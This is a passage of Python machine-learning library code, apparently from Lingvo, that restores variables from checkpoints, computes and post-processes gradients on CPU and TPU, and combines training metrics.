    var_ignore_rules: A list consisting of a list of regexes to match parameter
      names in the model which should not be overridden, even if they match
      those in the loading rules.

  Returns:
    A callable that, when called with a tf.Session, will restore the variables
    from the provided checkpoint.

  Raises:
    ValueError: if no variable matches the loading rules.
  """
  vars_to_load = _GetVarsToLoad(all_vars, variable_loading_rules,
                                var_ignore_rules, checkpoint_path)
  if not vars_to_load:
    all_rules_text = '\n'.join(
        [f'{k} --> {v}' for k, v in variable_loading_rules])
    raise ValueError(f'Variable loading rules {all_rules_text} '
                     f'did not match any of {len(all_vars)} vars.')
  load_var_names = '\n'.join(sorted([v.name for _, v in vars_to_load]))
  tf.logging.info(f'Overriding {len(vars_to_load)} vars from '
                  f'{checkpoint_path}:\n{load_var_names}')
  savers = []
  while vars_to_load:
    # When restoring, it's possible the same value in the checkpoint
    # can be restored to multiple variables (e.g. during
    # distillation). However, tf.train.Saver, since it's used for
    # both saving and restoring, requires the name in the checkpoint
    # to be unique for each variable. So, we call it multiple times
    # with a unique set of names each time.
    unique_vars_to_load = {}
    remaining_vars_to_load = []
    for k, v in vars_to_load:
      if k not in unique_vars_to_load:
        unique_vars_to_load[k] = v
      else:
        # Duplicate checkpoint name; handled by a later Saver in the loop.
        remaining_vars_to_load.append((k, v))
    savers.append(tf.train.Saver(var_list=unique_vars_to_load, sharded=True))
    vars_to_load = remaining_vars_to_load

  def _Restore(sess):
    # Each saver restores a name-disjoint subset; together they cover all.
    for saver in savers:
      saver.restore(sess, checkpoint_path)

  return _Restore
def OverrideVarsFromCheckpoints(all_vars, ckpts_loading_rules):
  """Add TF graph ops to override model variables from checkpoints.

  Args:
    all_vars: List of all the parameters in the model.
    ckpts_loading_rules: A dictionary of checkpoint path: loading rules.
      Checkpoint path must be a path to a pretrained model, and loading rules is
      expected to be a tuple of two lists. The first consisting of tuples of
      strings defining (regex to match parameter names in the model to override,
      format string to determine the corresponding var in the checkpoint), and
      the second list consisting of a list of regexes to match parameter names
      in the model which should not be overridden, even if they match those in
      the loading rules.

  Returns:
    A callable that, when called with a tf.Session, will restore the variables
    from checkpoint and return the set of overridden variable names.

  Raises:
    ValueError: if colliding vars exist or loading rules is not a list.
  """
  if len(ckpts_loading_rules) > 1:
    tf.logging.info('Overriding vars from multiple checkpoints.')

  var_refs_overridden = set()
  var_names_overridden = set()
  restore_fns = []
  for ckpt_path, loading_rules in ckpts_loading_rules.items():
    tf.logging.info('Overriding vars from checkpoint: %s', ckpt_path)

    if not isinstance(loading_rules, tuple):
      raise ValueError('Loading rules for %s must be a tuple of two lists!' %
                       ckpt_path)
    if len(loading_rules) != 2 or not all(
        isinstance(l, list) for l in loading_rules):
      raise ValueError('Loading rules for %s must be a tuple of two lists!' %
                       ckpt_path)

    # Filter the model variables to be overridden.
    to_load_vars = _GetVarsToLoad(all_vars, loading_rules[0], loading_rules[1],
                                  ckpt_path)
    # experimental_ref() makes variables hashable for set membership tests.
    var_refs_to_override = [var[1].experimental_ref() for var in to_load_vars]
    var_names_to_override = [var[1].name for var in to_load_vars]

    overlap_refs = set.intersection(var_refs_overridden, var_refs_to_override)
    if overlap_refs:
      # A variable may be overridden from at most one checkpoint.
      raise ValueError('Colliding variables to override: %s' % overlap_refs)

    restore_fns.append(
        OverrideVarsFromCheckpoint(all_vars, ckpt_path, loading_rules[0],
                                   loading_rules[1]))
    var_refs_overridden.update(var_refs_to_override)
    var_names_overridden.update(var_names_to_override)
  tf.logging.info('Model variables overridden: %s', var_refs_overridden)

  def _Restore(sess):
    for fn in restore_fns:
      fn(sess)
    return var_names_overridden

  return _Restore
def ComputeGradientsSimple(loss_or_activations,
                           all_vars,
                           grad_aggregation_method,
                           colocate_gradients_with_ops,
                           gate_gradients,
                           activations_grad=None):
  """Computes gradients of `loss_or_activations` w.r.t. `all_vars`.

  Thin wrapper around tf.gradients.

  Args:
    loss_or_activations: the loss tensor, or activation tensors when
      backpropagating from intermediate activations.
    all_vars: the variables (or tensors) to differentiate with respect to.
    grad_aggregation_method: aggregation method to pass to tf.gradients.
    colocate_gradients_with_ops: whether each gradient op is colocated with
      the corresponding forward op.
    gate_gradients: whether to tuple gradients (passed to tf.gradients).
    activations_grad: optional incoming gradients (grad_ys) for
      `loss_or_activations`.

  Returns:
    A list of gradients, one per entry of `all_vars` (entries may be None).
  """
  return tf.gradients(
      loss_or_activations,
      all_vars,
      grad_ys=activations_grad,
      aggregation_method=grad_aggregation_method,
      colocate_gradients_with_ops=colocate_gradients_with_ops,
      gate_gradients=gate_gradients)
def _ComputeGradientsTpu(loss_or_activations,
                         all_vars,
                         grad_aggregation_method,
                         colocate_gradients_with_ops,
                         gate_gradients,
                         skip_zero_gradients=None,
                         use_bf16_gradients_ar=False,
                         defer_crs_to_apply_grad=False,
                         activations_grad=None,
                         is_activations=False,
                         tpu_embedding_activations=None):
  """Computes gradients for local loss across whole TPU cluster.

  This implementation specializes for the case where weight params maybe used
  for different number of times in the forward computation, so that gradients
  should be normalized by the actual number of times they are being computed.

  TODO(yonghui): Maybe merge this implementation with the _ComputeGradientsTpu
  one.

  Args:
    loss_or_activations: The loss or activations to backprop from.
    all_vars: Vars with respect to which gradients are to be computed.
    grad_aggregation_method: aggregation method to use when calling
      tf.gradients.
    colocate_gradients_with_ops: boolean, whether or not to colocate gradient op
      with the original op.
    gate_gradients: boolean, flag to be passed to tf.gradients.
    skip_zero_gradients: whether to skip zero gradients during aggregation.
    use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
      all-reduce.
    defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
      apply_gradient. This helps reducing the number of gradient all-reduces
      when doing gradient accumulation, which does gradient cross replica sum
      only every k steps in a tf.cond. Currently this works only when
      skip_zero_gradients is None.
    activations_grad: The gradients computed for activations.
    is_activations: A boolean, whether the input is loss or activations.
    tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
      embedding feature tensor.

  Returns:
    Gradients to be passed back. If tpu_embedding_activations is set, their
    gradients will be placed at the end.

  Raises:
    ValueError: upon invalid arguments.
  """
  if is_activations:
    assert activations_grad is not None
  if not skip_zero_gradients and not is_activations:
    # Scale the loss to account for the full batch size.
    shards = tpu_function.get_tpu_context().number_of_shards
    assert shards
    loss_or_activations *= tf.constant(
        1.0 / shards, dtype=loss_or_activations.dtype)
  else:
    assert not tpu_embedding_activations, (
        'Gradient computation for tpu embedding activations requires proper '
        'loss scaling, and so is not compatible with skip_zero_gradients and '
        'is_activations.')

  # Computes the gradients.
  # Sum the grads so that we can compute statistics across the whole batch.
  all_grads = ComputeGradientsSimple(
      loss_or_activations=loss_or_activations,
      all_vars=all_vars +
      (tpu_embedding_activations if tpu_embedding_activations else []),
      grad_aggregation_method=grad_aggregation_method,
      colocate_gradients_with_ops=colocate_gradients_with_ops,
      gate_gradients=gate_gradients,
      activations_grad=activations_grad)
  if tpu_embedding_activations:
    # Note we don't need to aggregate TPU embedding gradients below.
    # Embedding activations were appended to all_vars above, so their grads
    # occupy the tail of all_grads.
    tpu_embedding_grads = all_grads[len(all_vars):]
    all_grads = all_grads[:len(all_vars)]
  else:
    tpu_embedding_grads = []

  # NOTE: We can't use tpu_optimizer.CrossShardOptimizer since
  # we need to scale the grads *after* the cross_replica_sum to
  # match GPU version!
  # TODO(cwhipkey): should we do something different here? - we could do
  # some operations on the gradients before the aggregation (see comments in
  # tensorflow/contrib/tpu/python/tpu/tpu_optimizer.py - see compute_gradients -
  # for some more details).
  aggregated_grads = []
  for g in all_grads:
    if g is None:
      # Keep a placeholder so indices stay aligned with all_vars.
      aggregated_grads.append(None)
      continue
    if use_bf16_gradients_ar:
      g = tf.cast(g, tf.bfloat16)
    with tf.ops.colocate_with(g):
      if skip_zero_gradients is None:
        # loss is already scaled by 1/shards.
        if defer_crs_to_apply_grad:
          normalized_g = tf.convert_to_tensor(g)
        else:
          normalized_g = tf.tpu.cross_replica_sum(g)
      else:
        # Compute the cross-replica mean of 'g', skipping zero gradients.

        # Q(yonghui): Is there a better way to detect a non-zero gradient?
        # Note(yonghui): gradient of a weight can be zero if that
        # weight is not used in the forward computation, e.g. as in
        # switchable layers in neural architecture search, pruned by channel
        # mask, or sparsified.
        if skip_zero_gradients == 'weight':
          # Same shape as 'g'.
          g_is_non_zero = tf.cast(tf.math.abs(g) > 1e-8, g.dtype)
        elif skip_zero_gradients == 'variable':
          # A variable-wide 0/1 scalar.
          g_is_non_zero = tf.cast(
              tf.reduce_sum(tf.math.abs(g)) > 1e-24, g.dtype)
        else:
          raise ValueError('Unknown skip_zero_gradients: %s' %
                           skip_zero_gradients)
        # Normalize by the number of replicas with a non-zero gradient
        # (at least 1 to avoid division by zero).
        num_updates = tf.maximum(tf.tpu.cross_replica_sum(g_is_non_zero), 1.0)
        normalized_g = tf.tpu.cross_replica_sum(g) / num_updates
      aggregated_grads.append(normalized_g)
  return aggregated_grads + tpu_embedding_grads
class VarGrad:
  """Couples a variable with its gradient; behaves like a (var, grad) pair.

  Supports attribute access (.var, .grad), indexing, and iteration/unpacking,
  delegating everything to an internal namedtuple.
  """

  # Backing namedtuple providing the 'var'/'grad' fields.
  _VAR_GRAD = py_collections.namedtuple('VarGradNamedTuple', ['var', 'grad'])

  def __init__(self, *args, **kwargs):
    self._var_grad = VarGrad._VAR_GRAD(*args, **kwargs)

  def __getitem__(self, key):
    return self._var_grad[key]

  def __getattr__(self, key):
    # Delegate unknown attributes (notably 'var' and 'grad') to the tuple.
    return getattr(self._var_grad, key)

  def __iter__(self):
    return self._var_grad.__iter__()

  def __repr__(self):
    pair = self._var_grad
    return 'VarGrad(%r, %r)' % (pair.var, pair.grad)
def SkipNoneGradients(var_grads):
  """Removes pairs whose grad is None."""
  # Log every entry that is about to be dropped.
  for key, var_grad in var_grads.FlattenItems():
    if var_grad.grad is None:
      tf.logging.info('ComputeGradients drops %s', key)

  def _HasGrad(var_grad):
    return var_grad.grad is not None

  return var_grads.Filter(_HasGrad)
def ComputeGradients(
    loss_or_activations,
    vmap,
    grad_aggregation_method=tf.AggregationMethod.EXPERIMENTAL_TREE,
    colocate_gradients_with_ops=True,
    gate_gradients=False,
    compute_gradients_fn=None,
    skip_zero_gradients=None,
    use_bf16_gradients_ar=False,
    skip_none_gradients=True,
    defer_crs_to_apply_grad=False,
    activations_grad=None,
    is_activations=False,
    tpu_embedding_activations=None):
  """Computes gradients of variables in vmap w.r.t loss.

  Args:
    loss_or_activations: either the loss, which is a scalar tensor, or
      activations, which could be a tensor or a list of tensors.
    vmap: A `.NestedMap` of variables.
    grad_aggregation_method: Specifies the method used to combine gradient
      terms. Accepted values are constants defined in the class
      AggregationMethod.
    colocate_gradients_with_ops: If True, try colocating gradients with the
      corresponding op.
    gate_gradients: If True, add a tuple around the gradients returned for an
      operations. This avoids some race conditions.
    compute_gradients_fn: Function to use to compute gradients. If None, use
      default. compute_gradients_fn should have the same signature as this
      function, but without the last argument.
    skip_zero_gradients: Whether to skip aggregating zero gradients. This helps
      in case where some weights may not be used in forward computation, e.g.,
      sparsely activated networks or switchable layers in neural architectural
      search. Only applicable on TPU.
      Possible values are:

      - None: do not skip zero gradients;
      - `variable`: skip if the entire variable's gradients are almost zero;
        reduce_sum(abs(grads)) < 1e-8.
      - `weight`: skip if the individual weight's gradients are almost zero:
        abs(grad) < 1e-8.
    use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
      all-reduce. This applies to TPU only.
    skip_none_gradients: Whether to skip gradients that are None.
    defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
      apply_gradient. This applies to TPU only.
    activations_grad: The gradients computed for activations.
    is_activations: A boolean, whether the input is loss or activations.
    tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
      embedding feature tensor.

  Returns:
    var_grad - a `.NestedMap` of VarGrad. You can view
    var_grad as an ordered list of (key, (var, grad)) tuples. Every
    key of var_grad exists in vmap. Every variable in vmap that
    contributes to loss must exist in var_grad. Every var of var_grad
    must exist in vmap. grad is the corresponding gradient computed
    for var. grad is guaranteed to be not None.

    If tpu_embedding_activations is set, a sub `.NestedMap` named
    tpu_embedding_var_grads will be used to store the VarGrads for the
    activations. In this case, key is the feature name, and var in the VarGrad
    is the activation tensor (not a real variable).
  """
  if not is_activations:
    # The loss must be a scalar.
    loss_or_activations = HasRank(loss_or_activations, 0)
  if not tpu_embedding_activations:
    tpu_embedding_activations = NestedMap()
  assert isinstance(tpu_embedding_activations, NestedMap)
  assert isinstance(vmap, NestedMap)
  assert skip_zero_gradients in (None, 'variable', 'weight')

  # Uniqify and remove None.
  filtered_vmap = vmap.Filter(_Unique())
  assert filtered_vmap is not None

  # Filter out variables not contributing to 'loss_or_activations'.
  # This doesn't work if the training loop is wrapped inside a tf.function,
  # since all variables will be lifted out and trainable_variables will be
  # empty. In that case we skip the check.
  trainable_variables = set(tf.trainable_variables())
  if trainable_variables:

    def Needed(v):
      if isinstance(v, tf.Variable):
        if v not in trainable_variables:
          # Skip non-trainable variables. Otherwise,
          # tf.Optimizer.apply_gradients throws up an exception instead
          # of skipping the update.
          return False
      return True

    filtered_vmap = filtered_vmap.Filter(Needed)
    assert filtered_vmap is not None

  filtered_vlist = filtered_vmap.Flatten()

  # Use caller-supplied gradient function if supplied.
  if compute_gradients_fn is not None:
    assert not tpu_embedding_activations
    take_grad = compute_gradients_fn
  else:
    # tpu vs non-tpu is slightly different.
    if use_tpu():
      take_grad = functools.partial(
          _ComputeGradientsTpu,
          skip_zero_gradients=skip_zero_gradients,
          use_bf16_gradients_ar=use_bf16_gradients_ar,
          defer_crs_to_apply_grad=defer_crs_to_apply_grad,
          activations_grad=activations_grad,
          is_activations=is_activations,
          tpu_embedding_activations=tpu_embedding_activations.Flatten())
    else:
      assert not tpu_embedding_activations
      take_grad = ComputeGradientsSimple

  grads = take_grad(loss_or_activations, filtered_vlist,
                    grad_aggregation_method, colocate_gradients_with_ops,
                    gate_gradients)
  if tpu_embedding_activations:
    # TPU embedding gradients are returned at the tail of the grads list.
    tpu_embedding_grads = grads[len(filtered_vlist):]
    grads = grads[:len(filtered_vlist)]
  else:
    tpu_embedding_grads = None

  # Formulate pairs of (var, grad) and pack them into the same
  # structure as filtered_vmap.
  var_grads = filtered_vmap.Pack(
      [VarGrad(v, g) for v, g in zip(filtered_vlist, grads)])
  if skip_none_gradients:
    var_grads = SkipNoneGradients(var_grads)

  if tpu_embedding_grads:
    # Create VarGrads for TPU embedding activations in a dedicated sub map.
    assert 'tpu_embedding_var_grads' not in var_grads
    tpu_embedding_activation_list = tpu_embedding_activations.Flatten()
    tpu_embedding_var_grads = [
        VarGrad(v, g)
        for v, g in zip(tpu_embedding_activation_list, tpu_embedding_grads)
    ]
    tpu_embedding_var_grads = tpu_embedding_activations.Pack(
        tpu_embedding_var_grads)

    # Replace None gradients with zeros, since TPU embedding expect all
    # activations to have gradients.
    def _NoneToZeros(key, var_grad):
      if var_grad.grad is None:
        tf.logging.warning(
            f'TPU embedding gradient for feature {key} is None. Replacing with '
            'zeros.')
        return VarGrad(var_grad.var, tf.zeros_like(var_grad.var))
      return var_grad

    var_grads.tpu_embedding_var_grads = (
        tpu_embedding_var_grads.TransformWithKey(_NoneToZeros))

  return var_grads
def MaskGradients(var_grad, grad_mask):
  """Computes gradients of non-masked variables in vmap w.r.t loss.

  Args:
    var_grad: A `.NestedMap` of (variable, gradient)
    grad_mask: A dict of (variable name, mask).

  Returns:
    var_grad - a `.NestedMap` of (variable, mask * gradient).
  """

  def ApplyMask(entry):
    var = entry.var
    grad = entry.grad
    mask = grad_mask[var.name]
    if not isinstance(grad, tf.IndexedSlices):
      return VarGrad(var, grad * mask)
    # Sparse gradient: mask only the materialized slices.
    return VarGrad(var, tf.IndexedSlices(grad.values * mask, grad.indices))

  return var_grad.Transform(ApplyMask)
def ApplyGradMultiplier(vs_gs, grad_scale=None):
  """Scale gradients by grad_scale on same device as corresponding variables.

  Args:
    vs_gs: A `.NestedMap` of VarGrad.
    grad_scale: If None, each vs_gs entry has the scale. Otherwise, grad_scale
      applies to every entry.

  Returns:
    A `.NestedMap` of (variable, gradient * grad_scale). In particular, if
    grad_scale is 0, the result gradient is always 0, even if the input
    gradient is inf or nan.
  """

  def ScaleOrZero(var, grad, scale):
    grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
    # Use tf.where rather than a plain multiply so scale == 0 yields exact
    # zeros even for inf/nan gradients (0 * inf would be nan).
    return tf.where(
        tf.equal(scale, 0.), tf.zeros_like(grad),
        tf.cast(scale, grad.dtype) * grad)

  def Scale(item):
    """Scales the gradient."""
    var, grad = item
    assert grad is not None, ('No grad found for ', var.name)
    if grad_scale is None:
      # Per-entry scale, carried on the item itself.
      scale = item.scale
    else:
      scale = grad_scale
    with tf.device(var.device):
      if isinstance(grad, tf.IndexedSlices):
        grad = tf.IndexedSlices(
            ScaleOrZero(var, grad.values, scale), grad.indices,
            grad.dense_shape)
      else:
        grad = ScaleOrZero(var, grad, scale)
    return VarGrad(var, grad)

  return vs_gs.Transform(Scale)
def HasNanOrInf(x):
  """Returns a scalar bool tensor: True iff `x` contains any NaN or Inf."""
  if isinstance(x, tf.IndexedSlices):
    x = x.values
  with tf.device(x.device):
    if x.dtype.is_complex:
      # is_nan/is_inf do not take complex inputs; check both components.
      return tf.reduce_any(
          [HasNanOrInf(tf.math.real(x)),
           HasNanOrInf(tf.math.imag(x))])
    return tf.reduce_any(
        tf.math.logical_or(tf.math.is_nan(x), tf.math.is_inf(x)))
def HasNanOrInfGradient(var_grads):
  """Returns a bool tensor to indicate if `var_grads` contains NaNs or Infs.

  Args:
    var_grads: A `.NestedMap` with (var, grad) tuple as the map value.

  Returns:
    A bool scalar tensor to indicate if the `var_grads` contains NaNs or Infs.
  """
  checks = []
  for var_grad in var_grads.Flatten():
    checks.append(HasNanOrInf(var_grad[1]))
  return tf.reduce_any(checks)
def ApplyGradNormClipping(vs_gs, norm=1.0):
  """Clip gradients to norm on same device as corresponding variables.

  Args:
    vs_gs: A `.NestedMap` of VarGrad.
    norm: Each tensor's gradient will be scaled down to have a maximum L2-norm
      value of `norm`.

  Returns:
    A `.NestedMap` of VarGrad(variable, clipped_gradient), where each gradient
    is independently clipped to a maximum L2-norm of `norm`.
  """

  def ClipByNorm(var, grad, norm):
    grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
    return tf.clip_by_norm(grad, norm)

  def Clip(item):
    """Clips the gradient to `norm` on the variable's device."""
    var, grad = item
    assert grad is not None, ('No grad found for ', var.name)
    with tf.device(var.device):
      if isinstance(grad, tf.IndexedSlices):
        # Sparse gradient: clip the materialized slices only.
        grad = tf.IndexedSlices(
            ClipByNorm(var, grad.values, norm), grad.indices, grad.dense_shape)
      else:
        grad = ClipByNorm(var, grad, norm)
    return VarGrad(var, grad)

  return vs_gs.Transform(Clip)
# Graph collection name: variables in this collection are excluded from Lp
# regularization by AdjustGradientsWithLpLoss.
SKIP_LP_REGULARIZATION = '__lingvo_skip_lp_regularization'
def AdjustGradientsWithLpLoss(var_grads, lp_regularizer_weight, p=2.0):
  """Adjusts the map of (var, grad) with Lp regularization, where p=1.0 or 2.0.

  Args:
    var_grads: a `.NestedMap` or list of (variable, gradient).
    lp_regularizer_weight: Lp regularization weight.
    p: For now we support 1.0 or 2.0.

  Returns:
    A tuple (lp_loss, var_grads).

    - lp_loss: A scalar. The lp loss.
    - var_grads: a `.NestedMap` or list of (variable, gradient) regulated by Lp.
  """
  # TODO(yuancao): For now we support p=1 or 2, but this can be extended to
  # lp-norm in general.
  assert p in [2.0, 1.0], 'For now we only support L1/L2 regularization.'

  def GetVar(item):
    var, grad = item
    if isinstance(grad, tf.IndexedSlices):
      # For sparse (embedding) grads, only the rows actually looked up
      # (unique ids) contribute to the regularizer.
      with tf.device(var.device):
        ids = HasRank(grad.indices, 1)
        uniq_ids = tf.unique(ids).y
        return tf.gather(var, uniq_ids)
    else:
      return var

  def ShouldAdjust(v):
    # Variables registered in SKIP_LP_REGULARIZATION are exempt.
    return not _VarInCollection(v, tf.get_collection(SKIP_LP_REGULARIZATION))

  filtered_var_grads = [
      var_grad for var_grad in Flatten(var_grads) if ShouldAdjust(var_grad.var)
  ]
  filtered_vars = Transform(GetVar, filtered_var_grads)
  for v in filtered_vars:
    tf.logging.info('AdjustGradientsWithLpLoss: %s', v.name)

  if p == 2.0:
    lp_loss = 0.5 * lp_regularizer_weight * SumSquared(filtered_vars)
  elif p == 1.0:
    lp_loss = lp_regularizer_weight * SumAbs(filtered_vars)

  def LpGrad(var_grad):
    """Adjusts item's grad w/ Lp loss term."""
    var, grad = var_grad
    if isinstance(grad, tf.IndexedSlices):
      # Question(rpang): do we apply Lp loss here even if 'var' is in
      # SKIP_LP_REGULARIZATION?
      #
      # Note: IndexedSlces appears for embedding lookups.
      # Embedding lookup ids can have duplicate. For duplicated ids, we
      # only want to consider once for each ids.
      with tf.device(var.device):
        emb = HasRank(var, 2)
        vocab_size = tf.shape(emb)[0]
        ids = HasRank(grad.indices, 1)
        values = tf.gather(emb, ids)  # [#ids, dims]
      with tf.device(grad.device):
        # Counts is a vector of size vocab_size. counts[i] is i-th words
        # occurrences in 'ids'.
        counts = tf.math.unsorted_segment_sum(
            tf.ones_like(ids, dtype=values.dtype), ids, vocab_size)

        # Gradients for duplicated ids will be summed when they get
        # applied, and hence we account for that by first dividing
        # gradient resulting from lp loss by how many times the id is
        # duplicated.
        #
        # For each id in 'ids', we know counts[id] is non-zero,
        # hence, it's always safe to take reciprocal.
        weights = tf.math.reciprocal(tf.gather(counts, ids))
        weights = tf.expand_dims(weights, -1)  # [#ids, 1]
        if p == 2.0:
          grad_v = values
        elif p == 1.0:
          grad_v = tf.sign(values)
        delta = lp_regularizer_weight * weights * grad_v
        grad = tf.IndexedSlices(grad.values + delta, ids)
    elif not _VarInCollection(var, tf.get_collection(SKIP_LP_REGULARIZATION)):
      with tf.device(var.device):
        if p == 2.0:
          grad_v = var
        elif p == 1.0:
          grad_v = tf.sign(var)
        delta = lp_regularizer_weight * grad_v
      with tf.device(grad.device):
        grad += delta
    return VarGrad(var, grad)

  return lp_loss, Transform(LpGrad, var_grads)
def SplitRecursively(x, num_splits, axis=-1):
  """Splits Tensors in 'x' recursively.

  Args:
    x: a Tensor, or a list or NestMap containing Tensors to split.
    num_splits: number of splits per Tensor.
    axis: the split axis.

  Returns:
    A list of split values of length 'num_splits'.

    - If 'x' is a Tensor, a list of split Tensors.
    - If 'x' is a list, a list of lists, where each sublist has the same length
      as 'x' and the k'th element in each sublist corresponds to a split of the
      k'th element from 'x'.
    - If 'x' is a `.NestedMap`, a list of `.NestedMap`, where each field
      corresponds to a split from the same field of 'x'.
  """
  if isinstance(x, tf.Tensor):
    return tf.split(x, num_splits, axis=axis)
  if isinstance(x, list):
    # Split each element, then transpose [element][split] -> [split][element].
    per_element = [SplitRecursively(element, num_splits, axis) for element in x]
    return [list(group) for group in zip(*per_element)]
  if isinstance(x, NestedMap):
    results = [NestedMap() for _ in range(num_splits)]
    for key, val in x.items():
      for i, piece in enumerate(SplitRecursively(val, num_splits, axis)):
        results[i][key] = piece
    return results
  raise TypeError('Unexpected type for SplitRecursively: %s' % type(x))
def ConcatRecursively(splits, axis=-1):
  """Concatenates tensors from 'splits'.

  This is the inverse function of SplitRecursively.

  Args:
    splits: a list of splits to concatenate, where elements can be Tensors,
      lists, or `.NestedMap`. The elements must share the same type and
      structure. For example, list elements must have the same length;
      `.NestedMap` must have the same set of fields.
    axis: the concatenation axis.

  Returns:
    Concatenated data.

    - If input 'splits' are Tensors, returns a concatenated Tensor.
    - If input 'splits' are lists, returns a list of the same length where the
      k'th element represents concatenated data of the k'th element from each
      split.
    - If input 'splits' are `.NestedMap`, returns a `.NestedMap` with each field
      concatenated from corresponding fields of input splits.

  Raises:
    TypeError: if 'splits' is not a list or elements of 'splits' do not have
      known or matching types.
    ValueError: if 'splits' is empty or elements of 'splits' do not have
      matching structures.
  """
  if not isinstance(splits, list):
    raise TypeError('Non-list inputs for ConcatRecursively: %s' % splits)
  if not splits:
    raise ValueError('Empty inputs for ConcatRecursively: %s' % splits)
  # Use the first split as the structural template for all the others.
  tmpl = splits[0]
  if isinstance(tmpl, tf.Tensor):
    return tf.concat(splits, axis=axis)
  elif isinstance(tmpl, list):
    if not all(isinstance(split, list) for split in splits):
      raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
    if not all(len(split) == len(tmpl) for split in splits):
      raise ValueError('Length mismatch for ConcatRecursively: %s' % splits)
    # Concatenate position-wise across splits.
    return [
        ConcatRecursively([split[i]
                           for split in splits], axis)
        for i in range(len(tmpl))
    ]
  elif isinstance(tmpl, NestedMap):
    if not all(isinstance(split, NestedMap) for split in splits):
      raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
    results = NestedMap()
    for key in tmpl:
      results[key] = ConcatRecursively([split[key] for split in splits], axis)
    return results
  else:
    raise TypeError('Unexpected type for ConcatRecursively: %s' % type(splits))
def WeightedAvg(values, weights, sum_reduction_fn=tf.reduce_sum, name=''):
  """Computes weighted average of values from a tensor.

  Args:
    values: a tensor of values
    weights: a tensor of weights
    sum_reduction_fn: called to reduce the values and weights to single value
    name: name of metric.

  Returns:
    A tuple (avg, total_weight).

    - avg: weighted average value
    - total_weight: sum of all weights
  """
  msg = 'shape of values and weights tensors must match for metric ' + name
  values = with_dependencies(
      [assert_equal(tf.shape(values), tf.shape(weights), message=msg)], values)
  total_weight = sum_reduction_fn(weights)
  # divide_no_nan only supports tf.{float,complex}*.
  # Compute in float32 (float64 if values are already float64) and cast the
  # result back to the input dtype at the end.
  dtype = values.dtype if values.dtype is tf.float64 else tf.float32
  avg = tf.math.divide_no_nan(
      sum_reduction_fn(tf.cast(values, dtype) * tf.cast(weights, dtype)),
      tf.cast(total_weight, dtype))
  return tf.cast(avg, values.dtype), total_weight
def WeightedAvgOfMetrics(metrics):
  """Computes the weighted average of metrics in the list.

  Args:
    metrics: list of dictionaries of metrics

  Returns:
    ret_dict - dictionary of weighted averages of each metrics.
  """
  # Group (value, weight) pairs by metric name across all dicts.
  grouped = {}
  for metric_dict in metrics:
    for name, (value, weight) in metric_dict.items():
      grouped.setdefault(name, []).append((value, weight))

  ret_dict = {}
  for name in sorted(grouped):
    pairs = grouped[name]
    values = tf.stack([p[0] for p in pairs])
    weights = tf.stack([p[1] for p in pairs])
    ret_dict[name] = WeightedAvg(values, weights, tf.reduce_sum, name)
  return ret_dict
def ConcatPerExampleTensors(per_example):
  """Concatenate per-example tensors from many hosts into one large block.

  Args:
    per_example: list of dictionaries of per-example tensors.

  Returns:
    ret_dict - string -> concatenated tensors.
  """
  # Collect the tensors for each name across all input dicts.
  collected = {}
  for tensor_dict in per_example:
    for name, value in tensor_dict.items():
      collected.setdefault(name, []).append(value)

  ret_dict = {}
  for name in sorted(collected):
    # Concatenate along the leading (example) dimension.
    ret_dict[name] = tf.concat(collected[name], 0)
  return ret_dict
def CombineMetrics(loss_metric_weight_pairs):
  """Combines metrics from `loss_metric_weight_pairs` according to weights.

  Keys must either exist in all metrics, in which case the result is a
  weighted sum, or exist in only one metrics dict, in which case the value is
  copied (scaled only by its own target weight).

  Args:
    loss_metric_weight_pairs: a list of (metrics, weight) pairs, where each
      weight is a float and each metrics is a dict with str keys and
      (metric_value, target_weight) values.

  Returns:
    A dict with the same set of keys as input metrics and values of
    (weighted_sum(metric_value), weighted_sum(target_weight)).

  Raises:
    ValueError: if there exists a metric that exists in more than one element
      of `loss_metric_weight_pairs` but not in all of them.
  """
  all_keys = set(
      k for loss_metrics, _ in loss_metric_weight_pairs for k in loss_metrics)
  result = {}
  for k in all_keys:
    count = sum(
        1 for loss_metrics, _ in loss_metric_weight_pairs if k in loss_metrics)
    if count > 1 and count != len(loss_metric_weight_pairs):
      # Bug fix: the two string literals previously joined without a space,
      # producing "...more than onebut not all...".
      raise ValueError('Found metric %s which exists in more than one '
                       'but not all loss metrics.' % k)
    total_val = 0
    total_target_weight = 0
    for loss_metrics, weight in loss_metric_weight_pairs:
      if k in loss_metrics:
        val, target_weight = loss_metrics[k]
        if count == 1:
          # Single metric, don't multiply by the pair's weight.
          total_val = val * target_weight
          total_target_weight = target_weight
        else:
          # Total weighted sum of all predictions.
          total_val += weight * val * target_weight
          total_target_weight += weight * target_weight
    result[k] = (total_val / total_target_weight, total_target_weight)
  return result
def AddVN(p, x, per_step=False):
  """Adds variational noise to x.

  Args:
    p: Layer params, with a `vn` subparam containing `VariationalNoiseParams`.
    x: Input to add variational noise to.
    per_step: Whether to add per_step noise.

  Returns:
    The input with variational noise added according to params.
  """
  enabled = p.vn.per_step_vn if per_step else p.vn.global_vn
  if not enabled:
    return x
  if p.vn.scale is None:
    raise ValueError('VN scale must be set.')
  if p.vn.deterministic:
    seeds = GenerateStepSeedPair(p, GetGlobalStep())
    if not p.vn.per_step_vn:
      # First element of seeds is the global step; zero it out so the noise
      # does not depend on the step.
      seeds = tf.stack([tf.zeros_like(seeds[0]), seeds[1]])
    noise = DeterministicVN(p, seeds, tf.shape(x), mean=0.0, std=1.0)
  else:
    seed = p.vn.seed
    if seed and p.vn.per_step_vn:
      # TODO(b/171767456): Fix per_step_vn.
      # seed += GetGlobalStep() * 203984
      pass
    noise = tf.random.normal(tf.shape(x), stddev=1.0, seed=seed, dtype=x.dtype)
  return x + tf.cast(p.vn.scale, x.dtype) * noise
def VariationalNoiseParams(scale,
                           global_vn=False,
                           per_step_vn=False,
                           seed=None,
                           deterministic=False):
  """Returns a hyperparams.Params for variational noise.

  Args:
    scale: Std of the variational noise; a scalar or a scalar tensor.
    global_vn: Whether to add global variational noise every training step.
    per_step_vn: Whether to add per-timestep variational noise.
    seed: Random seed used to generate noise.
